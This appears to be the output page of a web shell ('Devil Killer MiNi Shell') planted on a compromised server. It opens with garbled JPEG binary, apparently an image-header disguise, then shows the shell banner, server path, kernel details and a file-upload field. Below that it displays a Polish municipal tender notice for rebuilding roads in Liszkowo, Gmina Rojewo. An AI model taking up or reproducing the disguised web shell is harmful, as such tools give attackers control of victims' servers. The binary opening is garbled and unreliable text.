JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250703/0030626001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych w miejscowości Liszkowo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rojewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350790</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rojewo 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rojewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rojewo@rojewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://samorzad.gov.pl/web/gmina-rojewo</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych w miejscowości Liszkowo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5c35d852-b394-4b58-96f9-d1e64ed2ff3c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00306260</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5c35d852-b394-4b58-96f9-d1e64ed2ff3c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a<br/>wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl<br/>oraz<br/>poczty<br/>elektronicznej:<br/>ref.budownictwa@rojewo.pl<br/>lub<br/>p.kazmierska@rojewo.pl. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku<br/>postępowania na Platformie e-Zamówienia):<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-5c35d852-b394-4b58-96f9-<br/>d1e64ed2ff3c<br/><br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). <br/>Szczegółowe informacje nt. komunikacji zawarto w cz. XIII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">15. Działając na podstawie § 11 ust. 1 pkt. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 roku – w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 r., poz. 2452),,<br/>Zamawiający informuje, że minimalne wymagania techniczne dotyczące sprzętu używanego w<br/>celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji<br/>połączenia określa Regulamin Platformy e-Zamówienia<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady<br/>Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone,<br/>zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W<br/>zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej<br/>wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Szczegółowe informacje nt. komunikacji zawarto w cz. XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RB.II.271.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.<br/>Przedmiotem zamówienia jest przebudowa drogi gminnej nr 150221C oraz drogi wewnętrznej na<br/>działkach nr 308/1, 305/19, 295, obręb Liszkowo. Oba odcinki objęte inwestycją projektuje się po<br/>śladzie istniejącej drogi. Zakres przedmiotu zamówienia obejmuje również wykonanie kanalizacji<br/>deszczowej.<br/>1)<br/>Odcinek 1: Początek opracowania stanowi włączenie drogi gminnej nr 150221C w drogę<br/>powiatową nr 2514C, koniec drogi gminnej nr 150221C znajduje się na wysokości działki<br/>nr 305/5 dowiązaniem wysokościowymi z kruszywa do istniejącej jezdni o nawierzchni<br/>gruntowo - żużlowej.<br/>v1<br/>6<br/>2)<br/>Odcinek 2: Początek opracowania stanowi włączenie drogi wewnętrznej w drogę gminną nr<br/>150221C, Koniec opracowania to włączenie drogi wewnętrznej w drogę powiatową nr<br/>2514C.<br/>2.<br/>W zakresie zadania inwestycyjnego zaplanowano:<br/>1)<br/>wykonanie nowej konstrukcji jezdni dróg gminnych oraz zjazdów do przyległych posesji o<br/>nawierzchni bitumicznej i z kostki betonowej.<br/>2)<br/>humusowanie terenu nieutwardzonego w granicach pasa drogowego i obsianie go trawą,<br/>3)<br/>regulację wysokościową chodnika w ciągu drogi powiatowej,<br/>4)<br/>wykonanie odwodnienia poprzez spadki podłużne i poprzeczne jezdni do projektowanych<br/>rowów drogowych oraz kanalizacji deszczowej, a także wyprofilowanie istniejącego rowu<br/>wzdłuż drogi gminnej, w celu właściwego spływu wód opadowych z kanalizacji deszczowej.<br/>5)<br/>odtworzenie istniejącego rowu przydrożnego wzdłuż drogi gminnej nr 150221C,<br/>6)<br/>zabezpieczenie istniejącej infrastruktury podziemnej (okablowania) rurami osłonowymi<br/>dwudzielnymi w miejscach kolizji z projektowanymi elementami oraz relokację<br/>kolidującego kabla teletechnicznego.<br/>7)<br/>Wycinkę drzew i krzewów kolidujących z inwestycją<br/>8)<br/>Wykonanie inwentaryzacji powykonawczej<br/>3.<br/>Długość projektowanej trasy w planie poddanej przebudowie wynosi 367,83 m, w tym - 103,66 m<br/>– droga gminna nr 150221C, - 264,17 m – droga wewnętrzna<br/>4.<br/>Szerokość jezdni 5,5 m. Szerokość poboczy 0,75 m. Spadek poprzeczny projektuje się jednostronny<br/>o wartości 2%.<br/>5.<br/>W rejonie objętym opracowaniem znajduje się infrastruktura techniczna: sieci wodociągowe, sieci<br/>elektroenergetyczne, sieci teletechniczne, sieci kanalizacyjne.<br/>6.<br/>Stan istniejący: Drogi posiadają jezdnię o nawierzchni gruntowej ulepszonej gruzem i żużlem.<br/>Wzdłuż dróg występuje pojedyncza zabudowa mieszkalna oraz zjazdy do nieruchomości.<br/>Odwodnienie odbywa się powierzchniowo na przyległy teren i częściowo do istniejących rowów i<br/>muld odwadniających.<br/>7.<br/>Zakres przedmiotu zamówienia obejmuje również wykonanie kanalizacji deszczowej z rur PVC o<br/>średnicy 400 mm, 315 mm i 200 mm o łącznej długości 156,50 m, wraz ze studniami żelbetowymi<br/>o średnicy 1200 mm, szt. 5 i wpustami ulicznymi z osadnikiem o średnicy 500 mm, szt. 2.<br/>Odbiornikiem wód deszczowych jest istniejący rów podlegający odtworzeniu.<br/>8.<br/>Szczegółowy opis oraz sposób realizacji zamówienia, uwzględnione zostały w dokumentacji<br/>projektowej. Wszystkie prace objęte przedmiotem postępowania i umowy powinny być wykonane<br/>zgodnie ze Specyfikacjami Technicznymi Wykonania i Odbioru Robót, Projektem budowlanym,<br/>oraz obowiązującymi przepisami prawa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień polegających na powtórzeniu<br/>podobnych robót budowlanych w rozumieniu przepisów, o których mowa w art. 214 ust. 1 pkt 7<br/>Pzp do 10 % wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi za wady i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu opisano szczegółowo w cz. VIII SWZ.<br/>1.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)<br/>zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w<br/>powyższym zakresie.<br/>2)<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym<br/>zakresie<br/>3)<br/>sytuacji ekonomicznej lub finansowej: Wykonawca musi wykazać, iż posiada<br/>ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 1.000.000, 00 zł<br/>4)<br/>zdolności technicznej lub zawodowej:<br/>v1<br/>9<br/>Zamawiający spełnia warunek jeżeli wykaże, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie roboty budowlane<br/>polegające na budowie lub przebudowie dróg o minimalnej powierzchni jezdni 200,00 m2<br/>każda oraz jedną robotę budowlaną polegającą na budowie przebudowie lub remoncie sieci<br/>kanalizacji deszczowej lub sanitarnej odpowiadającym swym rodzajem i zakresem<br/>przedmiotowi zamówienia<br/>b) dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności: drogowej (kierownik budowy), oraz jedną osobą<br/>posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych<br/>(kierownik robót).<br/>Wykonawca winien wykazać się osobami posiadającymi uprawnienia budowlane do sprawowania<br/>samodzielnych funkcji technicznych w budownictwie, zgodnie z wymaganymi przepisami ustawy<br/>z dn. 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2025 r. poz. 418) lub innymi uprawnieniami<br/>umożliwiającymi wykonywanie tych samych czynności, do wykonania których w aktualnym stanie<br/>prawnym upoważniają uprawnienia budowlane w tej samej specjalności. Zgodnie z art. 104 ustawy<br/>– Prawo budowlane – osoby, które przed dniem wejścia w życie ustawy (tj. przed dniem 01.01.1995<br/>r.) uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do<br/>pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do<br/>pełnienia tych funkcji w dotychczasowym zakresie.<br/>Powyższe oznacza, iż w razie złożenia oferty zawierającej wskazanie osób posiadających<br/>uprawnienia budowlane uzyskane przed 1995 r., wymaga się od Wykonawcy, aby osoby te<br/>posiadały uprawnienia zgodne z zakresem wskazanym w SWZ.<br/>W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium RP<br/>(w tym wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej) wymaga się od Wykonawcy, aby osoby te spełniały odpowiednie warunki opisane<br/>w art. 12a ustawy Prawo budowlane (t.j. Dz. U. z 2025 r. poz. 418) oraz pozostałych przepisów<br/>ww. ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r. poz. 334) oraz art.<br/>20a ustawy z dn. 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów<br/>budownictwa (t.j. Dz. U. z 2023 r. poz. 551)<br/>Zamawiający informuje, iż zgodnie z treścią art. 12 ust. 7 ustawy Prawo budowlane podstawę do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze<br/>decyzji, do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3 lit. a oraz zgodnie z<br/>v1<br/>10<br/>odrębnymi przepisami, wpis na listę członków właściwej izby samorządu zawodowego,<br/>potwierdzony zaświadczeniem wydanym przez tą izbę, z określonym w nim terminem ważności.<br/>Wymieniony skład osobowy zespołu Wykonawcy należy traktować jako minimalne wymagania<br/>Zamawiającego i nie wyczerpuje całości personelu niezbędnego do rzetelnego wypełnienia<br/>zobowiązań Wykonawcy.<br/>3.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne<br/>spełnianie warunku przez Wykonawców.<br/>4.<br/>Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.<br/>Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 23 000,00 zł<br/>(słownie: dwadzieścia trzy tysiące złotych 00/100 );<br/>2.<br/>Wadium wnosi się przed upływem terminu składania ofert.<br/>3.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)<br/>pieniądzu;<br/>2)<br/>gwarancjach bankowych;<br/>3)<br/>gwarancjach ubezpieczeniowych;<br/>4)<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym Pruszcz<br/>Pomorski O. Rojewo nr rachunku 37 8170 1018 0000 0130 2000 0050 z dopiskiem „Wadium<br/>Przebudowa dróg gminnych w miejscowości Liszkowo”<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania na<br/>rachunku Zamawiającego.<br/>4.<br/>Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub<br/>poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)<br/>musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie p.z.p.<br/>2)<br/>z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>3)<br/>powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)<br/>termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5)<br/>w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>6)<br/>beneficjentem poręczenia lub gwarancji jest: GMINA ROJEWO<br/>7)<br/>w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58<br/>p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>v1<br/>23<br/>5.<br/>Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie<br/>utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>6.<br/>Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 